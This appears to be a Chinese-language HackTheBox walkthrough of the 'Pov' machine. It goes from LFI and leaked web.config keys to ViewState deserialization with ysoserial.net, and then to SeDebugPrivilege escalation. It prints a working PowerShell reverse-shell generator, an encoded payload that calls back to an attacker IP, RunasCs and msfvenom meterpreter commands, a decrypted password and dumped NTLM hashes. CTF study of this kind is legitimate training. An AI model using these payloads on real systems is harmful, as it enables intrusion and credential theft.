知识点:web.config;VIESTATE 反序列化利用;PSCredential;Sedebugprivilege&winlogon。
Scan
┌──(kali㉿kali)-[~/Desktop/htb/pov]└─$ sudo nmap -sC -sV -Pn 10.10.11.251[] password for kali:Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-29 09:42 ESTNmap scan report for pov.htb (10.10.11.251)Host is up (0.34s latency).Not shown: 999 filtered tcp ports (no-response)PORT STATE SERVICE VERSION80/tcp open http Microsoft IIS httpd 10.0|_http-title: pov.htb|_http-server-header: Microsoft-IIS/10.0| http-methods:|_ Potentially risky methods: TRACEService Info: OS: Windows; CPE: cpe:/o:microsoft:windowsService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 79.95 seconds
Enum
常规测一波无果,子域名有东西
┌──(kali㉿kali)-[~/Desktop/htb/pov]└─$ gobuster dns -d pov.htb -w /usr/share/amass/wordlists/subdomains-top1mil-5000.txt===============================================================Gobuster v3.6by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[] Domain: pov.htb[] Threads: 10[] Timeout: 1s[] Wordlist: /usr/share/amass/wordlists/subdomains-top1mil-5000.txt===============================================================Starting gobuster in DNS enumeration mode===============================================================Found: dev.pov.htb
页面进去有LFI,抓包,改file参数,这里简单就概况带过一下。看web.config等文件,其中web.config里面有解密密钥和验证密钥(这里打完了懒得忘记截图了,懒得搞了,打完去看了别的佬的解法偷的图
以及如下等等,
ViewState
可以使用如下手法攻击:https://book.hacktricks.xyz/pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret#for-.net-framework-greater-than-4.5
github工具:https://github.com/pwntester/ysoserial.net?source=post_page-----75ab061c8adc--------------------------------
先生成一个base64编码的reverseshell。(https://gist.github.com/tothi/ab288fb523a4b32b51a53e542d40fe58#file-mkpsrevshell-py
#!/usr/bin/env python3## generate reverse powershell cmdline with base64 encoded args#import sysimport base64def help():print("USAGE: %s IP PORT" % sys.argv[0])print("Returns reverse shell PowerShell base64 encoded cmdline payload connecting to IP:PORT")exit()try:(ip, port) = (sys.argv[1], int(sys.argv[2]))except:help()# payload from Nikhil Mittal @samratashok# https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3payload = '$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'payload = payload % (ip, port)cmdline = "powershell -e " + base64.b64encode(payload.encode('utf16')[2:]).decode()print(cmdline)
把base生成的放到-c里执行即可。
.ysoserial.exe -p ViewState -g TextFormattingRunProperties --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" --path="/portfolio/default.aspx" -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOAAzACIALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="
将结果放进burp发包,改__VIEWSTATE 参数中并发送请求,可以得到revshell。
User
在 sfitz 的 Documents 目录中找到了一些有关用户 alading 的凭据。
PS C:userssfitzdocuments> type connection.xml<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><Obj RefId="0"><TN RefId="0"><T>System.Management.Automation.PSCredential</T><T>System.Object</T></TN><ToString>System.Management.Automation.PSCredential</ToString><Props><S N="UserName">alaading</S><SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6</SS></Props></Obj></Objs>
尝试解密这个密码,看文章:https://mcpmag.com/articles/2017/07/20/save-and-read-sensitive-data-with-powershell.aspx?source=post_page-----75ab061c8adc--------------------------------
PS C:userssfitzdocuments> $credential = Import-CliXml -Path C:userssfitzdocumentsconnection.xmlPS C:userssfitzdocuments> $credential.GetNetworkCredential().Passwordf8gQ8fynP44ek1m3PS C:userssfitzdocuments>
传一个runascs上去,弹一个allading的shell
PS C:userssfitzdesktop> wget 10.10.14.83:8000/RunasCs.exe -O RunanCs.exePS C:userssfitzdesktop> lsDirectory: C:userssfitzdesktopMode LastWriteTime Length Name---- ------------- ------ -----a---- 1/29/2024 6:54 AM 51712 RunanCs.exePS C:userssfitzdesktop> .RunanCs.exe alaading f8gQ8fynP44ek1m3 cmd.exe -r 10.10.14.83:5555[+] Running in session 0 with process function CreateProcessWithLogonW()[+] Using StationDesktop: Service-0x0-52d73$Default[+] Async process 'C:Windowssystem32cmd.exe' with pid 5384 created in background.
Root
看看权限,发现有sedebugprivilege,配合winlogon直接可以梭。搜资料学着打秒了。
(但是这里有个疑问。为什么 RunasCs 生成的 powershell 具有 SeDebugPrivilege,而 cmd 没SeDebugPrivilege)
用metasploit改变我的shell方便实现进程迁移,(cmd交互可以certutil.exe自带的传
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.83 LPORT=6666 -f exe >shell.exeuse exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost 10.10.14.83set lport 6666run
meterpreter > hashdumpAdministrator:500:aad3b435b51404eeaad3b435b51404ee:f7c883121d0f63ee5b4312ba7572689b:::alaading:1001:aad3b435b51404eeaad3b435b51404ee:31c0583909b8349cbe92961f9dfa5dbf:::DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::sfitz:1000:aad3b435b51404eeaad3b435b51404ee:012e5ed95e8745ea5180f81648b6ec94:::WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:1fa5b00b7c6cc4ac2807c4d5b3dd3dab:::
原文始发于微信公众号(搁浅安全):HTB-Pov(Medium)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论